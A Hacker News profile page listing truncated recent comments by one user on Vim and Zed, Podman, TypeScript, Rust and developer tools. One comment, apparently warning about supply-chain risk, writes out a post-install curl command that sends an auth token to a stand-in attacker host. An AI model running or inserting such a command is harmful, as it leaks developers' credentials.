Live data from Hacker News

Viewing profile — esamatti

esamatti

HN member
Joined
Fri, Nov 02, 2012, 12:25 PM UTC
HN karma
227
Public activity
42 items

About esamatti

http://twitter.com/esamatti

Recent public activity

  1. story
  2. comment
    Comment #44322789

    To me it has been the best "vim" that is not a real Vim. Way way better than the vscode plugin. I have used Vim and later Neovim since 2008 or so. Zed is the first non-vim I am tru…

  3. comment
    Comment #39215915

    I've actually found the animations helpful even thought was initially skeptical: Because it visualises the vim motions it makes it much clearer what is happening. Especially if you…

  4. comment
    Comment #38700498

    This is awesome! Thanks for sharing.

  5. comment
    Comment #37135697

    TIL, Pretty cool! But I suppose there isn't away to run these transient services as boot because they are definition gone after they have stopped?

  6. comment
    Comment #37020891

    Anyone using Podman on a macOS? How's the experience compared to Docker Desktop?

  7. comment
    Comment #33336033

    They say they plan to support Vue and Svelte via plugins so I guess it is a thing or will be. "In future versions, we'll be supporting Vue and Svelte via plugins." https://turbo.bu…

  8. comment
    Comment #32823822

    Also checkout yj[1] which can convert between various formats among toml->json [1]: https://github.com/sclevine/yj

  9. comment
    Comment #30163345

    Does this contain `request.formData()` and `FormData`? https://developer.mozilla.org/en-US/docs/Web/API/Request/for... https://developer.mozilla.org/en-US/docs/Web/API/FormData

  10. comment
    Comment #28591888

    Graderjs seems to be pretty nice idea. If you are already using Chrome, Graderjs apps weight around the same as a Chrome tab compared to Electron where each app will get its own Ch…

  11. comment
    Comment #28391021

    Seems like it ------- Podman is a tool for running Linux containers. You can do this from a MacOS desktop as long as you have access to a linux box either running inside of a VM on…

  12. comment
    Comment #26709602

    Hash the phone number in the browser before sending it to your server. That way it is at least possible to verify via devtools what is being send. Heck. Allow even prehashed phone …

  13. comment
    Comment #26314952

    "sh" for python is actually pretty cool https://amoffat.github.io/sh/ Available as `python3-sh` in Ubuntu.

  14. comment
    Comment #26076348

    Interesting business model ---------- Experts Host Sites Here for $1/month Do you like paying extra so other people can ask amateur questions? That's how it is at other hosting com…

  15. comment
    Comment #24615699

    Other uses for the template literal types: JSON parser https://twitter.com/buildsghost/status/1301976526603206657 This one is more realistic: Typed route params https://twitter.com…

  16. comment
    Comment #24372591

    Since learning Rust I wanted to learn some C to be better able to consume pure C libs or embed Rust into C apps. Along Modern C I found these modern(ish) C books: - C Programming: …

  17. comment
    Comment #23138974

    I wonder if the same method could be used to write Android Apps only with Rust?

  18. comment
    Comment #22075160

    This looks great! I've used sqlpad[1] for similar purposes which is bit more low level as it allows to write the queries in the browser directly. [1]: https://github.com/rickbergfa…

  19. comment
    Comment #21567960

    I think attacker could still do this in a post install script: curl -d secret=$NODE_AUTH https://attackershost.example/capture_secret

  20. comment
    Comment #21558050

    > If you are a Docker user, you understand that there is a daemon process that must be run to service all of your Docker commands. I can’t claim to understand the motivation behind…

  21. comment
    Comment #19104372

    That only uses local state. With constate you can access the state from anywhere without prop drilling.

  22. comment
    Comment #18993246

    I think Babel does excatly that if only enable the typescript-preset.

  23. comment
  24. comment
    Comment #15237241

    I think this is just an editor concern. It could show a list of files with type errors. But you could just run "tsc --noEmit --watch" which will just report the project wide type e…

  25. comment
    Comment #15236579

    Thanks. Here's the documentation about the enum issue https://github.com/babel/babel/tree/master/packages/babel-pl... I hope that in future Typescript would take the same approach …